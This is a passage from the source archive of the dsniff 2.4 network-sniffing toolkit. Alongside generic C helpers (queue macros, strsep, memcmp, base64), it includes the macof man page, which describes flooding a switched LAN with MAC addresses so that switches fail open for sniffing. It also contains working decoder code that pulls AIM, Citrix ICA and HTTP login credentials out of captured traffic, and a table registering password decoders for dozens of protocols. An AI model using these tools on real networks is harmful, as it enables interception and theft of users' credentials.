**tqe_prev; /* address of previous next element */ \ } /* * tail queue access methods */ #define TAILQ_FIRST(head) ((head)->tqh_first) #define TAILQ_END(head) NULL #define TAILQ_NEXT(elm, field) ((elm)->field.tqe_next) #define TAILQ_LAST(head, headname) \ (*(((struct headname *)((head)->tqh_last))->tqh_last)) /* XXX */ #define TAILQ_PREV(elm, headname, field) \ (*(((struct headname *)((elm)->field.tqe_prev))->tqh_last)) #define TAILQ_EMPTY(head) \ (TAILQ_FIRST(head) == TAILQ_END(head)) #define TAILQ_FOREACH(var, head, field) \ for((var) = TAILQ_FIRST(head); \ (var) != TAILQ_END(head); \ (var) = TAILQ_NEXT(var, field)) #define TAILQ_FOREACH_REVERSE(var, head, field) \ for((var) = TAILQ_LAST(head); \ (var) != TAILQ_END(head); \ (var) = TAILQ_PREV(var, field)) /* * Tail queue functions. */ #define TAILQ_INIT(head) do { \ (head)->tqh_first = NULL; \ (head)->tqh_last = &(head)->tqh_first; \ } while (0) #define TAILQ_INSERT_HEAD(head, elm, field) do { \ if (((elm)->field.tqe_next = (head)->tqh_first) != NULL) \ (head)->tqh_first->field.tqe_prev = \ &(elm)->field.tqe_next; \ else \ (head)->tqh_last = &(elm)->field.tqe_next; \ (head)->tqh_first = (elm); \ (elm)->field.tqe_prev = &(head)->tqh_first; \ } while (0) #define TAILQ_INSERT_TAIL(head, elm, field) do { \ (elm)->field.tqe_next = NULL; \ (elm)->field.tqe_prev = (head)->tqh_last; \ *(head)->tqh_last = (elm); \ (head)->tqh_last = &(elm)->field.tqe_next; \ } while (0) #define TAILQ_INSERT_AFTER(head, listelm, elm, field) do { \ if (((elm)->field.tqe_next = (listelm)->field.tqe_next) != NULL)\ (elm)->field.tqe_next->field.tqe_prev = \ &(elm)->field.tqe_next; \ else \ (head)->tqh_last = &(elm)->field.tqe_next; \ (listelm)->field.tqe_next = (elm); \ (elm)->field.tqe_prev = &(listelm)->field.tqe_next; \ } while (0) #define TAILQ_INSERT_BEFORE(listelm, elm, field) do { \ (elm)->field.tqe_prev = (listelm)->field.tqe_prev; \ (elm)->field.tqe_next = (listelm); \ *(listelm)->field.tqe_prev = (elm); \ (listelm)->field.tqe_prev = &(elm)->field.tqe_next; \ } while (0) #define TAILQ_REMOVE(head, elm, field) do { \ if (((elm)->field.tqe_next) != NULL) \ (elm)->field.tqe_next->field.tqe_prev = \ (elm)->field.tqe_prev; \ else \ (head)->tqh_last = (elm)->field.tqe_prev; \ *(elm)->field.tqe_prev = (elm)->field.tqe_next; \ } while (0) #define TAILQ_REPLACE(head, elm, elm2, field) do { \ if (((elm2)->field.tqe_next = (elm)->field.tqe_next) != NULL) \ (elm2)->field.tqe_next->field.tqe_prev = \ &(elm2)->field.tqe_next; \ else \ (head)->tqh_last = &(elm2)->field.tqe_next; \ (elm2)->field.tqe_prev = (elm)->field.tqe_prev; \ *(elm2)->field.tqe_prev = (elm2); \ } while (0) /* * Circular queue definitions. */ #define CIRCLEQ_HEAD(name, type) \ struct name { \ struct type *cqh_first; /* first element */ \ struct type *cqh_last; /* last element */ \ } #define CIRCLEQ_HEAD_INITIALIZER(head) \ { CIRCLEQ_END(&head), CIRCLEQ_END(&head) } #define CIRCLEQ_ENTRY(type) \ struct { \ struct type *cqe_next; /* next element */ \ struct type *cqe_prev; /* previous element */ \ } /* * Circular queue access methods */ #define CIRCLEQ_FIRST(head) ((head)->cqh_first) #define CIRCLEQ_LAST(head) ((head)->cqh_last) #define CIRCLEQ_END(head) ((void *)(head)) #define CIRCLEQ_NEXT(elm, field) ((elm)->field.cqe_next) #define CIRCLEQ_PREV(elm, field) ((elm)->field.cqe_prev) #define CIRCLEQ_EMPTY(head) \ (CIRCLEQ_FIRST(head) == CIRCLEQ_END(head)) #define CIRCLEQ_FOREACH(var, head, field) \ for((var) = CIRCLEQ_FIRST(head); \ (var) != CIRCLEQ_END(head); \ (var) = CIRCLEQ_NEXT(var, field)) #define CIRCLEQ_FOREACH_REVERSE(var, head, field) \ for((var) = CIRCLEQ_LAST(head); \ (var) != CIRCLEQ_END(head); \ (var) = CIRCLEQ_PREV(var, field)) /* * Circular queue functions. */ #define CIRCLEQ_INIT(head) do { \ (head)->cqh_first = CIRCLEQ_END(head); \ (head)->cqh_last = CIRCLEQ_END(head); \ } while (0) #define CIRCLEQ_INSERT_AFTER(head, listelm, elm, field) do { \ (elm)->field.cqe_next = (listelm)->field.cqe_next; \ (elm)->field.cqe_prev = (listelm); \ if ((listelm)->field.cqe_next == CIRCLEQ_END(head)) \ (head)->cqh_last = (elm); \ else \ (listelm)->field.cqe_next->field.cqe_prev = (elm); \ (listelm)->field.cqe_next = (elm); \ } while (0) #define CIRCLEQ_INSERT_BEFORE(head, listelm, elm, field) do { \ (elm)->field.cqe_next = (listelm); \ (elm)->field.cqe_prev = (listelm)->field.cqe_prev; \ if ((listelm)->field.cqe_prev == CIRCLEQ_END(head)) \ (head)->cqh_first = (elm); \ else \ (listelm)->field.cqe_prev->field.cqe_next = (elm); \ (listelm)->field.cqe_prev = (elm); \ } while (0) #define CIRCLEQ_INSERT_HEAD(head, elm, field) do { \ (elm)->field.cqe_next = (head)->cqh_first; \ (elm)->field.cqe_prev = CIRCLEQ_END(head); \ if ((head)->cqh_last == CIRCLEQ_END(head)) \ (head)->cqh_last = (elm); \ else \ (head)->cqh_first->field.cqe_prev = (elm); \ (head)->cqh_first = (elm); \ } while (0) #define CIRCLEQ_INSERT_TAIL(head, elm, field) do { \ (elm)->field.cqe_next = CIRCLEQ_END(head); \ (elm)->field.cqe_prev = (head)->cqh_last; \ if ((head)->cqh_first == CIRCLEQ_END(head)) \ (head)->cqh_first = (elm); \ else \ (head)->cqh_last->field.cqe_next = (elm); \ (head)->cqh_last = (elm); \ } while (0) #define CIRCLEQ_REMOVE(head, elm, field) do { \ if ((elm)->field.cqe_next == CIRCLEQ_END(head)) \ (head)->cqh_last = (elm)->field.cqe_prev; \ else \ (elm)->field.cqe_next->field.cqe_prev = \ (elm)->field.cqe_prev; \ if ((elm)->field.cqe_prev == CIRCLEQ_END(head)) \ (head)->cqh_first = (elm)->field.cqe_next; \ else \ (elm)->field.cqe_prev->field.cqe_next = \ (elm)->field.cqe_next; \ } while (0) #define CIRCLEQ_REPLACE(head, elm, elm2, field) do { \ if (((elm2)->field.cqe_next = (elm)->field.cqe_next) == \ CIRCLEQ_END(head)) \ (head).cqh_last = (elm2); \ else \ (elm2)->field.cqe_next->field.cqe_prev = (elm2); \ if (((elm2)->field.cqe_prev = (elm)->field.cqe_prev) == \ CIRCLEQ_END(head)) \ (head).cqh_first = (elm2); \ else \ (elm2)->field.cqe_prev->field.cqe_next = (elm2); \ } while (0) #endif /* !_SYS_QUEUE_H_ */ dsniff-2.4/missing/libgen.h0000600000175000017500000000330207204257541015554 0ustar lucianoluciano/* * libgen.h * * Adapted from OpenBSD libc *err* *warn* code. * * Copyright (c) 2000 Dug Song * * Copyright (c) 1997 Todd C. Miller * All rights reserved. * * Redistribution and use in source and binary forms, with or without * modification, are permitted provided that the following conditions * are met: * 1. Redistributions of source code must retain the above copyright * notice, this list of conditions and the following disclaimer. * 2. Redistributions in binary form must reproduce the above copyright * notice, this list of conditions and the following disclaimer in the * documentation and/or other materials provided with the distribution. * 3. The name of the author may not be used to endorse or promote products * derived from this software without specific prior written permission. * * THIS SOFTWARE IS PROVIDED ``AS IS'' AND ANY EXPRESS OR IMPLIED WARRANTIES, * INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY * AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL * THE AUTHOR BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, * EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, * PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; * OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, * WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR * OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF * ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. */ #ifndef _LIBGEN_H_ #define _LIBGEN_H_ char *basename(const char *); char *dirname(const char *); #endif /* _LIBGEN_H_ */ dsniff-2.4/missing/strsep.c0000600000175000017500000000547707210774354015651 0ustar lucianoluciano/* $Id: strsep.c,v 1.1 2000/11/28 18:26:52 dugsong Exp $ */ /* $OpenBSD: strsep.c,v 1.3 1997/08/20 04:28:14 millert Exp $ */ /*- * Copyright (c) 1990, 1993 * The Regents of the University of California. All rights reserved. * * Redistribution and use in source and binary forms, with or without * modification, are permitted provided that the following conditions * are met: * 1. Redistributions of source code must retain the above copyright * notice, this list of conditions and the following disclaimer. * 2. Redistributions in binary form must reproduce the above copyright * notice, this list of conditions and the following disclaimer in the * documentation and/or other materials provided with the distribution. * 3. All advertising materials mentioning features or use of this software * must display the following acknowledgement: * This product includes software developed by the University of * California, Berkeley and its contributors. * 4. Neither the name of the University nor the names of its contributors * may be used to endorse or promote products derived from this software * without specific prior written permission. * * THIS SOFTWARE IS PROVIDED BY THE REGENTS AND CONTRIBUTORS ``AS IS'' AND * ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE * ARE DISCLAIMED. IN NO EVENT SHALL THE REGENTS OR CONTRIBUTORS BE LIABLE * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS * OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT * LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY * OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF * SUCH DAMAGE. */ #include #include /* * Get next token from string *stringp, where tokens are possibly-empty * strings separated by characters from delim. * * Writes NULs into the string at *stringp to end tokens. * delim need not remain constant from call to call. * On return, *stringp points past the last NUL written (if there might * be further tokens), or is NULL (if there are definitely no more tokens). * * If *stringp is NULL, strsep returns NULL. */ char * strsep(stringp, delim) register char **stringp; register const char *delim; { register char *s; register const char *spanp; register int c, sc; char *tok; if ((s = *stringp) == NULL) return (NULL); for (tok = s;;) { c = *s++; spanp = delim; do { if ((sc = *spanp++) == c) { if (c == 0) s = NULL; else s[-1] = 0; *stringp = s; return (tok); } } while (sc != 0); } /* NOTREACHED */ } dsniff-2.4/missing/dummy.c0000600000175000017500000000000007211003437015421 0ustar lucianolucianodsniff-2.4/missing/memcmp.c0000600000175000017500000000430707211205532015562 0ustar lucianoluciano/* $Id: memcmp.c,v 1.1 2000/11/29 13:57:46 dugsong Exp $ */ /*- * Copyright (c) 1990 The Regents of the University of California. * All rights reserved. * * This code is derived from software contributed to Berkeley by * Chris Torek. * * Redistribution and use in source and binary forms, with or without * modification, are permitted provided that the following conditions * are met: * 1. Redistributions of source code must retain the above copyright * notice, this list of conditions and the following disclaimer. * 2. Redistributions in binary form must reproduce the above copyright * notice, this list of conditions and the following disclaimer in the * documentation and/or other materials provided with the distribution. * 3. All advertising materials mentioning features or use of this software * must display the following acknowledgement: * This product includes software developed by the University of * California, Berkeley and its contributors. * 4. Neither the name of the University nor the names of its contributors * may be used to endorse or promote products derived from this software * without specific prior written permission. * * THIS SOFTWARE IS PROVIDED BY THE REGENTS AND CONTRIBUTORS ``AS IS'' AND * ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE * ARE DISCLAIMED. IN NO EVENT SHALL THE REGENTS OR CONTRIBUTORS BE LIABLE * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS * OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT * LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY * OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF * SUCH DAMAGE. */ #include /* * Compare memory regions. */ int memcmp(s1, s2, n) const void *s1, *s2; size_t n; { if (n != 0) { register const unsigned char *p1 = s1, *p2 = s2; do { if (*p1++ != *p2++) return (*--p1 - *--p2); } while (--n != 0); } return (0); } dsniff-2.4/macof.80000600000175000017500000000205707204257542013657 0ustar lucianoluciano.TH MACOF 8 .ad .fi .SH NAME macof \- flood a switched LAN with random MAC addresses .SH SYNOPSIS .na .nf .fi \fBmacof\fR [\fB-i \fIinterface\fR] [\fB-s \fIsrc\fR] [\fB-d \fIdst\fR] [\fB-e \fItha\fR] [\fB-x \fIsport\fR] [\fB-y \fIdport\fR] [\fB-n \fItimes\fR] .SH DESCRIPTION .ad .fi \fBmacof\fR floods the local network with random MAC addresses (causing some switches to fail open in repeating mode, facilitating sniffing). A straight C port of the original Perl Net::RawIP macof program by Ian Vitek . .SH OPTIONS .IP "\fB-i \fIinterface\fR" Specify the interface to send on. .IP "\fB-s \fIsrc\fR" Specify source IP address. .IP "\fB-d \fIdst\fR" Specify destination IP address. .IP "\fB-e \fItha\fR" Specify target hardware address. .IP "\fB-x \fIsport\fR" Specify TCP source port. .IP "\fB-y \fIdport\fR" Specify TCP destination port. .IP "\fB-n \fItimes\fR" Specify the number of packets to send. .LP Values for any options left unspecified will be generated randomly. .SH "SEE ALSO" dsniff(8) .SH AUTHOR .na .nf Dug Song dsniff-2.4/base64.c0000600000175000017500000002062507254077073013736 0ustar lucianoluciano/* $Id: base64.c,v 1.4 2001/03/15 08:32:59 dugsong Exp $ * * Copyright (c) 1996 by Internet Software Consortium. * * Permission to use, copy, modify, and distribute this software for any * purpose with or without fee is hereby granted, provided that the above * copyright notice and this permission notice appear in all copies. * * THE SOFTWARE IS PROVIDED "AS IS" AND INTERNET SOFTWARE CONSORTIUM DISCLAIMS * ALL WARRANTIES WITH REGARD TO THIS SOFTWARE INCLUDING ALL IMPLIED WARRANTIES * OF MERCHANTABILITY AND FITNESS. IN NO EVENT SHALL INTERNET SOFTWARE * CONSORTIUM BE LIABLE FOR ANY SPECIAL, DIRECT, INDIRECT, OR CONSEQUENTIAL * DAMAGES OR ANY DAMAGES WHATSOEVER RESULTING FROM LOSS OF USE, DATA OR * PROFITS, WHETHER IN AN ACTION OF CONTRACT, NEGLIGENCE OR OTHER TORTIOUS * ACTION, ARISING OUT OF OR IN CONNECTION WITH THE USE OR PERFORMANCE OF THIS * SOFTWARE. */ /* * Portions Copyright (c) 1995 by International Business Machines, Inc. * * International Business Machines, Inc. (hereinafter called IBM) grants * permission under its copyrights to use, copy, modify, and distribute this * Software with or without fee, provided that the above copyright notice and * all paragraphs of this notice appear in all copies, and that the name of IBM * not be used in connection with the marketing of any product incorporating * the Software or modifications thereof, without specific, written prior * permission. * * To the extent it has a right to do so, IBM grants an immunity from suit * under its patents, if any, for the use, sale or manufacture of products to * the extent that such products are used for performing Domain Name System * dynamic updates in TCP/IP networks by means of the Software. No immunity is * granted for any product per se or for any other function of any product. * * THE SOFTWARE IS PROVIDED "AS IS", AND IBM DISCLAIMS ALL WARRANTIES, * INCLUDING ALL IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A * PARTICULAR PURPOSE. IN NO EVENT SHALL IBM BE LIABLE FOR ANY SPECIAL, * DIRECT, INDIRECT, OR CONSEQUENTIAL DAMAGES OR ANY DAMAGES WHATSOEVER ARISING * OUT OF OR IN CONNECTION WITH THE USE OR PERFORMANCE OF THIS SOFTWARE, EVEN * IF IBM IS APPRISED OF THE POSSIBILITY OF SUCH DAMAGES. */ #include #include #include #include #include #include "base64.h" #define Assert(Cond) if (!(Cond)) abort() static const char Base64[] = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/"; static const char Pad64 = '='; /* (From RFC1521 and draft-ietf-dnssec-secext-03.txt) The following encoding technique is taken from RFC 1521 by Borenstein and Freed. It is reproduced here in a slightly edited form for convenience. A 65-character subset of US-ASCII is used, enabling 6 bits to be represented per printable character. (The extra 65th character, "=", is used to signify a special processing function.) The encoding process represents 24-bit groups of input bits as output strings of 4 encoded characters. Proceeding from left to right, a 24-bit input group is formed by concatenating 3 8-bit input groups. These 24 bits are then treated as 4 concatenated 6-bit groups, each of which is translated into a single digit in the base64 alphabet. Each 6-bit group is used as an index into an array of 64 printable characters. The character referenced by the index is placed in the output string. Table 1: The Base64 Alphabet Value Encoding Value Encoding Value Encoding Value Encoding 0 A 17 R 34 i 51 z 1 B 18 S 35 j 52 0 2 C 19 T 36 k 53 1 3 D 20 U 37 l 54 2 4 E 21 V 38 m 55 3 5 F 22 W 39 n 56 4 6 G 23 X 40 o 57 5 7 H 24 Y 41 p 58 6 8 I 25 Z 42 q 59 7 9 J 26 a 43 r 60 8 10 K 27 b 44 s 61 9 11 L 28 c 45 t 62 + 12 M 29 d 46 u 63 / 13 N 30 e 47 v 14 O 31 f 48 w (pad) = 15 P 32 g 49 x 16 Q 33 h 50 y Special processing is performed if fewer than 24 bits are available at the end of the data being encoded. A full encoding quantum is always completed at the end of a quantity. When fewer than 24 input bits are available in an input group, zero bits are added (on the right) to form an integral number of 6-bit groups. Padding at the end of the data is performed using the '=' character. Since all base64 input is an integral number of octets, only the ------------------------------------------------- following cases can arise: (1) the final quantum of encoding input is an integral multiple of 24 bits; here, the final unit of encoded output will be an integral multiple of 4 characters with no "=" padding, (2) the final quantum of encoding input is exactly 8 bits; here, the final unit of encoded output will be two characters followed by two "=" padding characters, or (3) the final quantum of encoding input is exactly 16 bits; here, the final unit of encoded output will be three characters followed by one "=" padding character. */ /* skips all whitespace anywhere. converts characters, four at a time, starting at (or after) src from base - 64 numbers into three 8 bit bytes in the target area. it returns the number of data bytes stored at the target, or -1 on error. */ int base64_pton(src, target, targsize) char const *src; u_char *target; size_t targsize; { int tarindex, state, ch; char *pos; state = 0; tarindex = 0; while ((ch = *src++) != '\0') { if (isspace(ch)) /* Skip whitespace anywhere. */ continue; if (ch == Pad64) break; pos = strchr(Base64, ch); if (pos == 0) /* A non-base64 character. */ return (-1); switch (state) { case 0: if (target) { if (tarindex >= targsize) return (-1); target[tarindex] = (pos - Base64) << 2; } state = 1; break; case 1: if (target) { if (tarindex + 1 >= targsize) return (-1); target[tarindex] |= (pos - Base64) >> 4; target[tarindex+1] = ((pos - Base64) & 0x0f) << 4 ; } tarindex++; state = 2; break; case 2: if (target) { if (tarindex + 1 >= targsize) return (-1); target[tarindex] |= (pos - Base64) >> 2; target[tarindex+1] = ((pos - Base64) & 0x03) << 6; } tarindex++; state = 3; break; case 3: if (target) { if (tarindex >= targsize) return (-1); target[tarindex] |= (pos - Base64); } tarindex++; state = 0; break; } } /* * We are done decoding Base-64 chars. Let's see if we ended * on a byte boundary, and/or with erroneous trailing characters. */ if (ch == Pad64) { /* We got a pad char. */ ch = *src++; /* Skip it, get next. */ switch (state) { case 0: /* Invalid = in first position */ case 1: /* Invalid = in second position */ return (-1); case 2: /* Valid, means one byte of info */ /* Skip any number of spaces. */ for (; ch != '\0'; ch = *src++) if (!isspace(ch)) break; /* Make sure there is another trailing = sign. */ if (ch != Pad64) return (-1); ch = *src++; /* Skip the = */ /* Fall through to "single trailing =" case. */ /* FALLTHROUGH */ case 3: /* Valid, means two bytes of info */ /* * We know this char is an =. Is there anything but * whitespace after it? */ for (; ch != '\0'; ch = *src++) if (!isspace(ch)) return (-1); /* * Now make sure for cases 2 and 3 that the "extra" * bits that slopped past the last full byte were * zeros. If we don't check them, they become a * subliminal channel. */ if (target && target[tarindex] != 0) return (-1); } } else { /* * We ended by seeing the end of the string. Make sure we * have no partial bytes lying around. */ if (state != 0) return (-1); } return (tarindex); } dsniff-2.4/decode.c0000600000175000017500000001215507254077073014074 0ustar lucianoluciano/* * decode.c * * Copyright (c) 2000 Dug Song * * $Id: decode.c,v 1.13 2001/03/15 08:32:59 dugsong Exp $ */ #include "config.h" #include #include #include #include #include #include #include "decode.h" extern int decode_hex(u_char *, int, u_char *, int); extern int decode_ftp(u_char *, int, u_char *, int); extern int decode_telnet(u_char *, int, u_char *, int); extern int decode_smtp(u_char *, int, u_char *, int); extern int decode_pptp(u_char *, int, u_char *, int); extern int decode_http(u_char *, int, u_char *, int); extern int decode_ospf(u_char *, int, u_char *, int); extern int decode_poppass(u_char *, int, u_char *, int); extern int decode_pop(u_char *, int, u_char *, int); extern int decode_nntp(u_char *, int, u_char *, int); extern int decode_smb(u_char *, int, u_char *, int); extern int decode_imap(u_char *, int, u_char *, int); extern int decode_snmp(u_char *, int, u_char *, int); extern int decode_ldap(u_char *, int, u_char *, int); extern int decode_mmxp(u_char *, int, u_char *, int); extern int decode_rlogin(u_char *, int, u_char *, int); extern int decode_rip(u_char *, int, u_char *, int); extern int decode_socks(u_char *, int, u_char *, int); extern int decode_citrix(u_char *, int, u_char *, int); extern int decode_oracle(u_char *, int, u_char *, int); extern int decode_tds(u_char *, int, u_char *, int); extern int decode_sniffer(u_char *, int, u_char *, int); extern int decode_cvs(u_char *, int, u_char *, int); extern int decode_icq(u_char *, int, u_char *, int); extern int decode_napster(u_char *, int, u_char *, int); extern int decode_aim(u_char *, int, u_char *, int); extern int decode_postgresql(u_char *, int, u_char *, int); extern int decode_pcanywhere(u_char *, int, u_char *, int); extern int decode_x11(u_char *, int, u_char *, int); extern int decode_irc(u_char *, int, u_char *, int); extern int decode_portmap(u_char *, int, u_char *, int); extern int decode_mountd(u_char *, int, u_char *, int); extern int decode_vrrp(u_char *, int, u_char *, int); extern int decode_ypserv(u_char *, int, u_char *, int); extern int decode_yppasswd(u_char *, int, u_char *, int); static struct decode decodes[] = { { "hex", decode_hex }, { "ftp", decode_ftp }, { "telnet", decode_telnet }, { "smtp", decode_smtp }, { "pptp", decode_pptp }, { "http", decode_http }, { "ospf", decode_ospf }, { "poppass", decode_poppass }, { "pop", decode_pop }, { "nntp", decode_nntp }, { "smb", decode_smb }, { "imap", decode_imap }, { "snmp", decode_snmp }, { "ldap", decode_ldap }, { "mmxp", decode_mmxp }, { "rlogin", decode_rlogin }, { "rip", decode_rip }, { "socks", decode_socks }, { "citrix", decode_citrix }, { "oracle", decode_oracle }, { "tds", decode_tds }, { "sniffer", decode_sniffer }, { "cvs", decode_cvs }, { "icq", decode_icq }, { "napster", decode_napster }, { "aim", decode_aim }, { "postgresql", decode_postgresql }, { "pcanywhere", decode_pcanywhere }, { "vrrp", decode_vrrp }, { "x11", decode_x11 }, { "irc", decode_irc }, { "portmap", decode_portmap }, { "mountd", decode_mountd }, { "ypserv", decode_ypserv }, { "yppasswd", decode_yppasswd }, { NULL } }; struct decode * getdecodebyname(const char *name) { struct decode *dc; for (dc = decodes; dc->dc_name != NULL; dc++) { if (strcasecmp(dc->dc_name, name) == 0) return (dc); } return (NULL); } /* Strip telnet options, as well as suboption data. */ int strip_telopts(u_char *buf, int len) { int i, j, subopt = 0; char *p, *q; for (i = j = 0; i < len; i++) { if (buf[i] == IAC) { if (++i >= len) break; else if (buf[i] > SB) i++; else if (buf[i] == SB) { /* XXX - check for autologin username. */ p = buf + i + 1; if ((q = bufbuf(p, len - i, "\xff", 1)) != NULL) { if ((p = bufbuf(p, q - p, "USER\x01", 5)) != NULL) { p += 5; buf[j++] = '['; memcpy(buf + j, p, q - p); j += q - p; buf[j++] = ']'; buf[j++] = '\n'; } } subopt = 1; } else if (buf[i] == SE) { if (!subopt) j = 0; subopt = 0; } } else if (!subopt) { /* XXX - convert isolated returns to newlines. */ if (buf[i] == '\r' && i + 1 < len && buf[i + 1] != '\n') buf[j++] = '\n'; /* XXX - strip binary nulls. */ else if (buf[i] != '\0') buf[j++] = buf[i]; } } buf[j] = '\0'; return (j); } /* Strip a string buffer down to a maximum number of lines. */ int strip_lines(char *buf, int max_lines) { char *p; int lines, nonascii; if (!buf) return (0); lines = nonascii = 0; for (p = buf; *p && lines < max_lines; p++) { if (*p == '\n') lines++; if (!isascii(*p)) nonascii++; } if (*p) *p = '\0'; /* XXX - lame ciphertext heuristic */ if (nonascii * 3 > p - buf) return (0); return (lines); } int is_ascii_string(char *buf, int len) { int i; for (i = 0; i < len; i++) if (!isascii(buf[i])) return (0); return (1); } u_char * bufbuf(u_char *big, int blen, u_char *little, int llen) { u_char *p; for (p = big; p <= big + blen - llen; p++) { if (memcmp(p, little, llen) == 0) return (p); } return (NULL); } dsniff-2.4/decode_aim.c0000600000175000017500000000416207254077073014721 0ustar lucianoluciano/* * decode_aim.c * * AOL Instant Messenger (and ICQ2000). * * Copyright (c) 2000 Dug Song * * $Id: decode_aim.c,v 1.5 2001/03/15 08:32:59 dugsong Exp $ */ #include "config.h" #include #include #include #include "hex.h" #include "buf.h" #include "decode.h" struct flap { u_char start; u_char channel; u_short seqnum; u_short datalen; }; static char *aim_xor1 = "Tic/Toc"; static u_char aim_xor2[] = { 0xf3, 0x26, 0x81, 0xc4, 0x39, 0x86, 0xdb, 0x92, 0x71, 0xa3, 0xb9, 0xe6, 0x53, 0x7a, 0x95, 0x7c }; int decode_aim(u_char *buf, int len, u_char *obuf, int olen) { struct buf *msg, inbuf, outbuf; struct flap *flap; u_char c, *p; int i, j; buf_init(&inbuf, buf, len); buf_init(&outbuf, obuf, olen); if (buf_cmp(&inbuf, "FLAPON\r\n\r\n", 10) == 0) buf_skip(&inbuf, 10); while (buf_len(&inbuf) > sizeof(*flap)) { flap = (struct flap *)buf_ptr(&inbuf); flap->datalen = ntohs(flap->datalen); i = sizeof(*flap) + flap->datalen; if ((msg = buf_tok(&inbuf, NULL, i)) == NULL) break; buf_skip(msg, sizeof(*flap)); if (buf_cmp(msg, "toc_signon ", 11) == 0) { msg->base[msg->end - 1] = '\0'; p = buf_ptr(msg); for (i = 0; i < 4; i++) { if ((j = strcspn(p, " ")) > 0) p += (j + 1); } if (strtok(p, " ") == NULL) continue; buf_putf(&outbuf, "%s ", buf_ptr(msg)); i = strlen(p); j = hex_decode(p, i, p, i); for (i = 0; i < j; i++) p[i] = p[i] ^ aim_xor1[i % 7]; p[i] = '\0'; buf_putf(&outbuf, "[%s]\n", p); } else if (flap->start == 0x2a && flap->channel == 0x01 && buf_cmp(msg, "\x00\x00\x00\x01", 4) == 0) { buf_skip(msg, 7); buf_get(msg, &c, 1); p = buf_ptr(msg); if (c == 0 || buf_skip(msg, c + 3) < 0) continue; p[c] = '\0'; buf_get(msg, &c, 1); if (buf_len(msg) < c + 1) continue; buf_putf(&outbuf, "%s\n", p); p = buf_ptr(msg); for (i = 0; i < c; i++) { p[i] = p[i] ^ aim_xor2[i % sizeof(aim_xor2)]; } p[i] = '\0'; buf_putf(&outbuf, "%s\n", p); break; } } buf_end(&outbuf); return (buf_len(&outbuf)); } dsniff-2.4/decode_citrix.c0000600000175000017500000000252607254077073015457 0ustar lucianoluciano/* * decode_citrix.c * * Citrix ICA. * * http://www.securityfocus.com/templates/archive.pike?list=1&date=200 \ * 0-04-15&msg=Pine.BSO.4.20.0003290949280.2640-100000@naughty.monkey.org * * Thanks to Jeremie Kass for providing me with * traffic traces. * * Copyright (c) 2000 Dug Song * * $Id: decode_citrix.c,v 1.5 2001/03/15 08:32:59 dugsong Exp $ */ #include "config.h" #include #include #include #include "buf.h" #include "decode.h" static u_char ica_magic[] = { 0x32, 0x26, 0x85, 0x92, 0x58 }; int decode_citrix(u_char *buf, int len, u_char *obuf, int olen) { struct buf inbuf, outbuf; u_char key, c, t[2]; int i; buf_init(&inbuf, buf, len); buf_init(&outbuf, obuf, olen); while ((i = buf_index(&inbuf, ica_magic, sizeof(ica_magic))) >= 0) { buf_skip(&inbuf, i); if (buf_len(&inbuf) < 60) break; buf_skip(&inbuf, 17); if (buf_get(&inbuf, &key, 1) != 1) break; buf_skip(&inbuf, 42); if (buf_get(&inbuf, &c, 1) != 1) break; c ^= ('C' | key); buf_put(&outbuf, &c, 1); i = 0; while (buf_get(&inbuf, t, 2) == 2) { c = t[0] ^ t[1] ^ key; if (c == '\0') { buf_put(&outbuf, "\n", 1); if (++i > 2) break; } buf_put(&outbuf, &c, 1); } } buf_end(&outbuf); return (buf_len(&outbuf)); } dsniff-2.4/decode_http.c0000600000175000017500000001015307254077073015127 0ustar lucianoluciano/* * decode_http.c * * Hypertext Transfer Protocol. * * Copyright (c) 2000 Dug Song * * $Id: decode_http.c,v 1.17 2001/03/15 08:32:59 dugsong Exp $ */ #include "config.h" #include #include #include #include #include #include #include #include "base64.h" #include "buf.h" #include "decode.h" #define USER_REGEX ".*account.*|.*acct.*|.*domain.*|.*login.*|" \ ".*member.*|.*user.*|.*name|.*email|.*_id|" \ "id|uid|mn|mailaddress" #define PASS_REGEX ".*pass.*|.*pw|pw.*|additional_info" #define REGEX_FLAGS (REG_EXTENDED | REG_ICASE | REG_NOSUB) static regex_t *user_regex, *pass_regex; static int grep_query_auth(char *buf) { char *p, *q, *tmp; int user, pass; user = pass = 0; if ((tmp = strdup(buf)) == NULL) return (0); for (p = 